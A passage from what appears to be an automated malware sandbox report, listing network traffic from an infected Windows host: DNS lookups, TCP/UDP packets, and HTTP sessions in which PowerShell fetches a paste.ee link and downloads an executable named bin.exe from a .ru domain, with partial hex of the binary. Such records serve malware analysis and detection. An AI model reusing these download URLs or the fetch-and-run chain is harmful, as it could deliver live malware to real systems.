                                                                                                                                                  Mar 22, 2021 12:39:51.034549952 CET804975445.95.183.230192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:51.034571886 CET804975445.95.183.230192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:51.034593105 CET804975445.95.183.230192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:51.034614086 CET804975445.95.183.230192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:51.034625053 CET4975480192.168.2.345.95.183.230
                                                                                                                                                  Mar 22, 2021 12:39:51.034635067 CET804975445.95.183.230192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:51.034636974 CET4975480192.168.2.345.95.183.230
                                                                                                                                                  Mar 22, 2021 12:39:51.034657001 CET804975445.95.183.230192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:51.034681082 CET804975445.95.183.230192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:51.034702063 CET804975445.95.183.230192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:51.034708023 CET4975480192.168.2.345.95.183.230
                                                                                                                                                  Mar 22, 2021 12:39:51.034723997 CET804975445.95.183.230192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:51.034744978 CET804975445.95.183.230192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:51.034750938 CET4975480192.168.2.345.95.183.230
                                                                                                                                                  Mar 22, 2021 12:39:51.034766912 CET804975445.95.183.230192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:51.034787893 CET804975445.95.183.230192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:51.034796000 CET4975480192.168.2.345.95.183.230
                                                                                                                                                  Mar 22, 2021 12:39:51.034809113 CET804975445.95.183.230192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:51.034827948 CET804975445.95.183.230192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:51.034849882 CET804975445.95.183.230192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:51.034854889 CET4975480192.168.2.345.95.183.230
                                                                                                                                                  Mar 22, 2021 12:39:51.034873962 CET804975445.95.183.230192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:51.034893990 CET804975445.95.183.230192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:51.034902096 CET4975480192.168.2.345.95.183.230
                                                                                                                                                  Mar 22, 2021 12:39:51.034914970 CET804975445.95.183.230192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:51.034936905 CET804975445.95.183.230192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:51.034940004 CET4975480192.168.2.345.95.183.230
                                                                                                                                                  Mar 22, 2021 12:39:51.034957886 CET804975445.95.183.230192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:51.034979105 CET804975445.95.183.230192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:51.034985065 CET4975480192.168.2.345.95.183.230
                                                                                                                                                  Mar 22, 2021 12:39:51.035042048 CET4975480192.168.2.345.95.183.230
                                                                                                                                                  Mar 22, 2021 12:39:51.082904100 CET804975445.95.183.230192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:51.082951069 CET804975445.95.183.230192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:51.082978964 CET804975445.95.183.230192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:51.083267927 CET4975480192.168.2.345.95.183.230
                                                                                                                                                  Mar 22, 2021 12:39:51.083899975 CET804975445.95.183.230192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:51.083930969 CET804975445.95.183.230192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:51.083962917 CET804975445.95.183.230192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:51.083986044 CET4975480192.168.2.345.95.183.230
                                                                                                                                                  Mar 22, 2021 12:39:51.084116936 CET4975480192.168.2.345.95.183.230
                                                                                                                                                  Mar 22, 2021 12:39:54.249258995 CET4975480192.168.2.345.95.183.230
                                                                                                                                                  Mar 22, 2021 12:40:01.821022987 CET49744443192.168.2.3104.21.45.223
                                                                                                                                                  Mar 22, 2021 12:40:01.821912050 CET4974380192.168.2.3172.67.219.133
                                                                                                                                                  Mar 22, 2021 12:40:42.630397081 CET4975880192.168.2.334.102.136.180
                                                                                                                                                  Mar 22, 2021 12:40:42.672293901 CET804975834.102.136.180192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:40:42.672437906 CET4975880192.168.2.334.102.136.180
                                                                                                                                                  Mar 22, 2021 12:40:42.672624111 CET4975880192.168.2.334.102.136.180
                                                                                                                                                  Mar 22, 2021 12:40:42.714282036 CET804975834.102.136.180192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:40:42.812581062 CET804975834.102.136.180192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:40:42.812628984 CET804975834.102.136.180192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:40:42.812988043 CET4975880192.168.2.334.102.136.180
                                                                                                                                                  Mar 22, 2021 12:40:42.813071012 CET4975880192.168.2.334.102.136.180
                                                                                                                                                  Mar 22, 2021 12:40:42.854643106 CET804975834.102.136.180192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:40:48.023201942 CET4975980192.168.2.3162.241.216.113
                                                                                                                                                  Mar 22, 2021 12:40:48.183908939 CET8049759162.241.216.113192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:40:48.184201956 CET4975980192.168.2.3162.241.216.113
                                                                                                                                                  Mar 22, 2021 12:40:48.184408903 CET4975980192.168.2.3162.241.216.113
                                                                                                                                                  Mar 22, 2021 12:40:48.344331980 CET8049759162.241.216.113192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:40:48.696443081 CET4975980192.168.2.3162.241.216.113
                                                                                                                                                  Mar 22, 2021 12:40:48.896358013 CET8049759162.241.216.113192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:40:49.329710960 CET8049759162.241.216.113192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:40:49.329797029 CET8049759162.241.216.113192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:40:49.329866886 CET8049759162.241.216.113192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:40:49.329938889 CET8049759162.241.216.113192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:40:49.329961061 CET4975980192.168.2.3162.241.216.113
                                                                                                                                                  Mar 22, 2021 12:40:49.329978943 CET8049759162.241.216.113192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:40:49.330030918 CET8049759162.241.216.113192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:40:49.330070972 CET8049759162.241.216.113192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:40:49.330074072 CET4975980192.168.2.3162.241.216.113
                                                                                                                                                  Mar 22, 2021 12:40:49.330228090 CET4975980192.168.2.3162.241.216.113
                                                                                                                                                  Mar 22, 2021 12:40:49.330307007 CET4975980192.168.2.3162.241.216.113
                                                                                                                                                  Mar 22, 2021 12:40:49.330321074 CET4975980192.168.2.3162.241.216.113
                                                                                                                                                  Mar 22, 2021 12:40:49.345158100 CET8049759162.241.216.113192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:40:49.345216036 CET8049759162.241.216.113192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:40:49.345314026 CET4975980192.168.2.3162.241.216.113
                                                                                                                                                  Mar 22, 2021 12:40:49.346215010 CET4975980192.168.2.3162.241.216.113
                                                                                                                                                  Mar 22, 2021 12:40:49.352520943 CET8049759162.241.216.113192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:40:49.352690935 CET4975980192.168.2.3162.241.216.113

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Mar 22, 2021 12:38:33.020747900 CET6349253192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:38:33.073215961 CET53634928.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:38:33.119121075 CET6083153192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:38:33.170561075 CET53608318.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:38:34.576903105 CET6010053192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:38:34.627973080 CET53601008.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:38:35.384994984 CET5319553192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:38:35.434258938 CET53531958.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:38:36.235089064 CET5014153192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:38:36.287390947 CET53501418.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:38:37.839370966 CET5302353192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:38:37.891598940 CET53530238.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:38:45.662970066 CET4956353192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:38:45.712306023 CET53495638.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:38:47.106905937 CET5135253192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:38:47.170597076 CET53513528.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:38:47.570291996 CET5934953192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:38:47.646894932 CET53593498.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:38:48.418253899 CET5708453192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:38:48.467782974 CET53570848.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:38:48.588680029 CET5934953192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:38:48.659255028 CET53593498.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:38:49.593540907 CET5934953192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:38:49.654189110 CET53593498.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:38:50.816203117 CET5882353192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:38:50.865488052 CET53588238.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:38:51.592889071 CET5934953192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:38:51.656203985 CET53593498.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:38:51.799662113 CET5756853192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:38:51.852116108 CET53575688.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:38:55.259852886 CET5054053192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:38:55.317528009 CET53505408.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:38:55.609241962 CET5934953192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:38:55.669819117 CET53593498.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:38:57.351299047 CET5436653192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:38:57.405664921 CET53543668.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:38:58.161360979 CET5303453192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:38:58.227513075 CET53530348.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:38:58.967792988 CET5776253192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:38:59.017287970 CET53577628.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:00.095170021 CET5543553192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:39:00.155214071 CET53554358.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:01.056452990 CET5071353192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:39:01.105945110 CET53507138.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:01.890755892 CET5613253192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:39:01.943030119 CET53561328.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:03.109601974 CET5898753192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:39:03.170744896 CET53589878.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:09.787830114 CET5657953192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:39:09.840145111 CET53565798.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:11.743797064 CET6063353192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:39:11.798165083 CET53606338.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:15.365075111 CET6129253192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:39:15.423126936 CET53612928.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:15.583138943 CET6361953192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:39:15.632891893 CET53636198.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:28.804536104 CET6493853192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:39:28.858269930 CET53649388.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:28.924144983 CET6194653192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:39:28.976285934 CET53619468.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:28.980094910 CET6491053192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:39:29.042962074 CET53649108.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:39.861231089 CET5212353192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:39:39.933890104 CET53521238.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:40.389370918 CET5613053192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:39:40.448765039 CET53561308.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:39:50.629515886 CET5633853192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:39:50.762267113 CET53563388.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:40:11.371814966 CET5942053192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:40:11.421205044 CET53594208.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:40:11.900568962 CET5878453192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:40:11.973912954 CET53587848.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:40:37.822318077 CET6397853192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:40:37.872128010 CET53639788.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:40:42.547501087 CET6293853192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:40:42.613049984 CET53629388.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:40:47.829896927 CET5570853192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:40:48.020936966 CET53557088.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:40:53.715063095 CET5680353192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:40:54.061537981 CET53568038.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:40:59.704004049 CET5714553192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:41:00.712544918 CET5714553192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:41:01.712599993 CET5714553192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:41:03.729499102 CET5714553192.168.2.38.8.8.8
                                                                                                                                                  Mar 22, 2021 12:41:04.404459953 CET53571458.8.8.8192.168.2.3
                                                                                                                                                  Mar 22, 2021 12:41:05.663296938 CET53571458.8.8.8192.168.2.3

                                                                                                                                                  ICMP Packets

                                                                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                  Mar 22, 2021 12:41:05.663388014 CET192.168.2.38.8.8.8cff6(Port unreachable)Destination Unreachable

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                  Mar 22, 2021 12:39:15.365075111 CET192.168.2.38.8.8.80x98bbStandard query (0)paste.eeA (IP address)IN (0x0001)
                                                                                                                                                  Mar 22, 2021 12:39:15.583138943 CET192.168.2.38.8.8.80xb530Standard query (0)paste.eeA (IP address)IN (0x0001)
                                                                                                                                                  Mar 22, 2021 12:39:50.629515886 CET192.168.2.38.8.8.80xbe4dStandard query (0)simpsongroup.ruA (IP address)IN (0x0001)
                                                                                                                                                  Mar 22, 2021 12:40:42.547501087 CET192.168.2.38.8.8.80x65e9Standard query (0)www.thesongwriterschool.comA (IP address)IN (0x0001)
                                                                                                                                                  Mar 22, 2021 12:40:47.829896927 CET192.168.2.38.8.8.80x505fStandard query (0)www.anastasiamatkovskia.comA (IP address)IN (0x0001)
                                                                                                                                                  Mar 22, 2021 12:40:53.715063095 CET192.168.2.38.8.8.80xacbdStandard query (0)www.sasayamagazine.comA (IP address)IN (0x0001)
                                                                                                                                                  Mar 22, 2021 12:40:59.704004049 CET192.168.2.38.8.8.80x5cb2Standard query (0)www.cjmaeilnews.comA (IP address)IN (0x0001)
                                                                                                                                                  Mar 22, 2021 12:41:00.712544918 CET192.168.2.38.8.8.80x5cb2Standard query (0)www.cjmaeilnews.comA (IP address)IN (0x0001)
                                                                                                                                                  Mar 22, 2021 12:41:01.712599993 CET192.168.2.38.8.8.80x5cb2Standard query (0)www.cjmaeilnews.comA (IP address)IN (0x0001)
                                                                                                                                                  Mar 22, 2021 12:41:03.729499102 CET192.168.2.38.8.8.80x5cb2Standard query (0)www.cjmaeilnews.comA (IP address)IN (0x0001)

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                  Mar 22, 2021 12:39:15.423126936 CET8.8.8.8192.168.2.30x98bbNo error (0)paste.ee172.67.219.133A (IP address)IN (0x0001)
                                                                                                                                                  Mar 22, 2021 12:39:15.423126936 CET8.8.8.8192.168.2.30x98bbNo error (0)paste.ee104.21.45.223A (IP address)IN (0x0001)
                                                                                                                                                  Mar 22, 2021 12:39:15.632891893 CET8.8.8.8192.168.2.30xb530No error (0)paste.ee104.21.45.223A (IP address)IN (0x0001)
                                                                                                                                                  Mar 22, 2021 12:39:15.632891893 CET8.8.8.8192.168.2.30xb530No error (0)paste.ee172.67.219.133A (IP address)IN (0x0001)
                                                                                                                                                  Mar 22, 2021 12:39:50.762267113 CET8.8.8.8192.168.2.30xbe4dNo error (0)simpsongroup.ru45.95.183.230A (IP address)IN (0x0001)
                                                                                                                                                  Mar 22, 2021 12:40:42.613049984 CET8.8.8.8192.168.2.30x65e9No error (0)www.thesongwriterschool.comthesongwriterschool.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Mar 22, 2021 12:40:42.613049984 CET8.8.8.8192.168.2.30x65e9No error (0)thesongwriterschool.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                  Mar 22, 2021 12:40:48.020936966 CET8.8.8.8192.168.2.30x505fNo error (0)www.anastasiamatkovskia.comanastasiamatkovskia.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Mar 22, 2021 12:40:48.020936966 CET8.8.8.8192.168.2.30x505fNo error (0)anastasiamatkovskia.com162.241.216.113A (IP address)IN (0x0001)
                                                                                                                                                  Mar 22, 2021 12:40:54.061537981 CET8.8.8.8192.168.2.30xacbdNo error (0)www.sasayamagazine.comsasayamagazine.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Mar 22, 2021 12:40:54.061537981 CET8.8.8.8192.168.2.30xacbdNo error (0)sasayamagazine.com150.95.52.106A (IP address)IN (0x0001)
                                                                                                                                                  Mar 22, 2021 12:41:04.404459953 CET8.8.8.8192.168.2.30x5cb2Server failure (2)www.cjmaeilnews.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Mar 22, 2021 12:41:05.663296938 CET8.8.8.8192.168.2.30x5cb2Server failure (2)www.cjmaeilnews.comnonenoneA (IP address)IN (0x0001)

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • paste.ee
                                                                                                                                                  • simpsongroup.ru
                                                                                                                                                  • www.thesongwriterschool.com
                                                                                                                                                  • www.anastasiamatkovskia.com

                                                                                                                                                  HTTP Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  0192.168.2.349743172.67.219.13380C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Mar 22, 2021 12:39:15.488746881 CET1349OUTGET /r/r87uc HTTP/1.1
                                                                                                                                                  Host: paste.ee
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Mar 22, 2021 12:39:15.574852943 CET1350INHTTP/1.1 301 Moved Permanently
                                                                                                                                                  Date: Mon, 22 Mar 2021 11:39:15 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d44db55efc63e79671afae686c5f546091616413155; expires=Wed, 21-Apr-21 11:39:15 GMT; path=/; domain=.paste.ee; HttpOnly; SameSite=Lax
                                                                                                                                                  Location: https://paste.ee/r/r87uc
                                                                                                                                                  Cache-Control: max-age=14400
                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                  Age: 423
                                                                                                                                                  cf-request-id: 08fb5478c300001fba903cb000000001
                                                                                                                                                  Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=HEmNcOkaQd%2FWZep5lnveLkQYslkqTqKmg0Azp4rA7XJsxupEamc1l4JoIJoiEzHKSOMf9i%2Fxh2vzH8moem8jEnltpSnmfb8XgQ%3D%3D"}]}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 633f236e0a7f1fba-AMS
                                                                                                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                  Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>
                                                                                                                                                  Mar 22, 2021 12:39:15.574903965 CET1350INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  1192.168.2.34975445.95.183.23080C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Mar 22, 2021 12:39:50.835138083 CET7659OUTGET /wp-admin/bin.exe HTTP/1.1
                                                                                                                                                  Host: simpsongroup.ru
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Mar 22, 2021 12:39:50.884932041 CET7661INHTTP/1.1 200 OK
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: application/x-executable
                                                                                                                                                  Last-Modified: Sun, 21 Mar 2021 19:46:00 GMT
                                                                                                                                                  Etag: "28400-6057a278-d89967789385f69e;;;"
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Content-Length: 164864
                                                                                                                                                  Date: Mon, 22 Mar 2021 11:39:50 GMT
                                                                                                                                                  Server: LiteSpeed
                                                                                                                                                  Data Raw: 4d 5a 45 52 e8 00 00 00 00 58 83 e8 09 8b c8 83 c0 3c 8b 00 03 c1 83 c0 28 03 08 ff e1 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c5 a5 8a 16 81 c4 e4 45 81 c4 e4 45 81 c4 e4 45 ee b2 4f 45 cd c4 e4 45 ee b2 7a 45 82 c4 e4 45 ee b2 79 45 80 c4 e4 45 52 69 63 68 81 c4 e4 45 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 01 00 3c 35 f6 44 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 72 02 00 00 00 00 00 00 00 00 00 70 d0 01 00 00 10 00 00 00 90 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 02 00 00 02 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 70 02 00 00 10 00 00 00 72 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                  Data Ascii: MZERX<(!L!This program cannot be run in DOS mode.$EEEOEEzEEyEERichEPEL<5Drp@@.text pr `
                                                                                                                                                  Mar 22, 2021 12:39:50.884958029 CET7662INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                  Data Ascii:
